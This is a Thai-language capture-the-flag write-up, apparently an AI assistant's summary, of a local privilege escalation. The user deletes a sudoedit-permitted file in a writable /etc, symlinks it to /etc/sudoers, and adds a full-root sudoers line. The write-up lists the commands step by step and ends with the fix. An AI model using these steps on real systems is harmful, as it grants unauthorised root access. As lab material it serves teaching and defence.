# privesc

ยินดีด้วยครับ! 🎉 ได้ธง cve{GYzUaW8Suq} เรียบร้อยแล้ว (Rooted!)

จาก Log ที่ดูวุ่นวาย จริงๆ แล้วสิ่งที่คุณทำสำเร็จคือการ "Bypass Sudoedit ด้วย Symlink" ครับ แม้ Log จะฟ้อง Error แต่มันมีจังหวะที่มันยอมทำงาน หรือไม่ก็ Environment Variable EDITOR ที่คุณตั้งค้างไว้มันทำงานจนทะลุไปแก้ไฟล์ได้

นี่คือสรุปแบบ Clean Version สำหรับเอาไปลง Notion ครับ:

🏴‍☠️ CTF Writeup: Sudoedit & Writable /etc

1. Reconnaissance (สำรวจ)
ตรวจสอบสิทธิ์ sudo ของ user ปัจจุบัน

Bash

sudo -l
Result:

(root) NOPASSWD: sudoedit /etc/test.txt User สามารถใช้ sudoedit แก้ไขไฟล์ /etc/test.txt ได้โดยไม่ต้องใส่รหัสผ่าน

ตรวจสอบ Permission ของโฟลเดอร์ /etc

Bash

ls -ld /etc

# หรือทดสอบด้วยการลบไฟล์

rm /etc/test.txt
Finding:

พบว่า User noob มีสิทธิ์ Write (เขียน/ลบ/สร้างไฟล์) ในโฟลเดอร์ /etc ได้ ซึ่งเป็น Misconfiguration ที่ร้ายแรงมาก

1. Exploitation (เจาะระบบ)
เราจะใช้เทคนิค Symlink Attack เพื่อหลอกให้ sudoedit ไปแก้ไขไฟล์ /etc/sudoers แทนไฟล์ /etc/test.txt

Step 1: เคลียร์ทาง ลบไฟล์เป้าหมายเดิมทิ้ง (เพราะเรามีสิทธิ์ในโฟลเดอร์ /etc)

Bash

rm /etc/test.txt
Step 2: สร้างกับดัก (Symlink) สร้าง Symlink ชื่อ test.txt ให้ชี้ไปที่ไฟล์ sudoers

Bash

ln -s /etc/sudoers /etc/test.txt
Step 3: โจมตี (Trigger) สั่งรัน sudoedit ตามสิทธิ์ที่ได้รับ

Bash

sudoedit /etc/test.txt
(ในความเป็นจริงคำสั่งนี้จะเปิดไฟล์ /etc/sudoers ขึ้นมาเพราะ Link ที่เราทำไว้)

Step 4: ยกระดับสิทธิ์ (Privilege Escalation) เมื่อ Text Editor เปิดขึ้นมา ให้เพิ่มบรรทัดนี้ลงไปเพื่อมอบสิทธิ์ root ให้ตัวเอง:

Plaintext

noob ALL=(ALL:ALL) ALL
Save และออกจาก Editor

1. Verification (ยืนยันผล)
เข้าสู่ Root shell

Bash

sudo bash

# หรือ

sudo su
(ระบบอาจถามรหัสผ่านของ user noob เพื่อยืนยัน)

Result:

root@machine:~# Rooted! 🚩

📝 Key Takeaway (สาระสำคัญ)
Vulnerability: การอนุญาต sudoedit บนไฟล์ที่อยู่ในโฟลเดอร์ที่ User เขียนทับได้ (Writable Directory) ทำให้เกิดช่องโหว่ Race Condition หรือ Symlink Attack ได้ง่าย

Fix: ห้ามให้ User ทั่วไปมีสิทธิ์ Write ใน /etc/ และควรระบุ path ของไฟล์ใน sudoers ให้รัดกุมกว่านี้